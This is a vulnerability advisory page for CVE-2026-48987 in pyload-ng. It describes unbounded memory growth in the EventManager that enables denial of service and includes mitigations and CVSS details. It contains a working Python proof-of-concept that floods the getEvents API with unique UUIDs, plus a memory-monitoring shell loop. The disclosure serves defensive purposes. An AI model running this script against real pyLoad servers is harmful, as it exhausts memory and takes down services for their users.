🛡️ CVE-2026-48987 — pyload-ng

⚪ Unknown ✅ No Known Exploit CWE-400 OSV
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

pyLoad: Unbounded Memory Growth Leading to DoS and Potential DDoS in EventManager

Description:

The EventManager module in pyload manages a list of Client instances for subscribing to events. The addition of each unique uuid from the get_events API causes the creation of a Client instance that gets appended to the clients list. Although there is a clean() method available in the EventManager module for removing non-responding Client instances, this method is never used in the EventManager or in the entire core application code. Consequently, this causes an uncontrolled growth in memory consumption until it becomes exhausted, resulting in a DoS attack.

Vulnerable Code:

https://github.com/pyload/pyload/blob/355c3f8d78a91f72d049e58f1edee8a972f845eb/src/pyload/core/managers/event_manager.py#L16-L17

> Here the client is added to the clients list but never cleared the inactive clients.

Exploitation:

1. Start pyLoad server (Ensure the pyload server is running)

2. Authenticate: Obtain a session cookie or an API key (Here i used the API key).

3. Send Requests: Run the below poc script to send a large number of requests to the getEvents API endpoint, each with a unique uuid.

```python

import requests

import uuid

import time

# Configuration

URL = "http://localhost:8000/api/getEvents"

NUM_REQUESTS = 100000

headers = {

"X-API-Key" : "<YOUR_APIKEY>"

}

print(f"Starting DoS attack: sending {NUM_REQUESTS} unique UUIDs...")

for i in range(NUM_REQUESTS):

# Generating a new UUID

uid = str(uuid.uuid4())

try:

# Sending request

requests.get(URL, params={"uuid": uid}, headers=headers, timeout=5)

if i % 1000 == 0:

print(f"Sent {i} requests...")

except requests.exceptions.RequestException as e:

print(f"Error at request {i}: {e}")

break

print("Attack complete. Check memory usage.")

```

5. Monitor Memory: Monitor the memory usage of the pyload process (e.g., using top, ps or the following commands).

```bash

PID=$(pgrep -f "pyload"); while true; do ps -o rss= -p $PID; sleep 1; done

```

6. Observe Growth: Notice that the memory consumption increases and never decreases, even after the requests stop and 30 seconds.

https://github.com/user-attachments/assets/28d460c9-655d-45a1-a47f-c0f4d196f686

Impact:

  • Denial of Service (DoS). The pyload process will consume all available system memory, leading to an Out-of-Memory (OOM) kill by the operating system or system-wide instability, affecting other services on the host.

Mitigations:

  • Invoke clean(): Call self.clean() at the beginning of the get_events method to purge inactive clients before processing new ones.
  • Rate Limiting: Implement rate limiting on the getEvents endpoint to prevent a single client from flooding the server with unique UUIDs.

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability high.

Weakness class

CVE-2026-48987 is classified as CWE-400: Uncontrolled Resource Consumption. A request can consume memory, CPU or storage without limit, exhausting capacity for everyone else.

Affected software

CVE-2026-48987 is recorded against 1 package.

  • pyload-ng

Timeline and source

Published on 9 July 2026 and last revised on 13 July 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.

References

github.com (Web)
github.com (Package)

Details

Severity Unknown
CVSS Score N/A
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CWE CWE-400
Public Exploit ✅ No
Source OSV
Published 2026-07-09
Updated 2026-08-12
Modified 2026-07-13
Fix URL N/A

Affected Packages

Software From version Fixed in
pyload-ng

Similar Threats

Free Vulnerability Check

Is your site affected by CVE-2026-48987?

BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against CVE-2026-48987 and other known CVE records.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.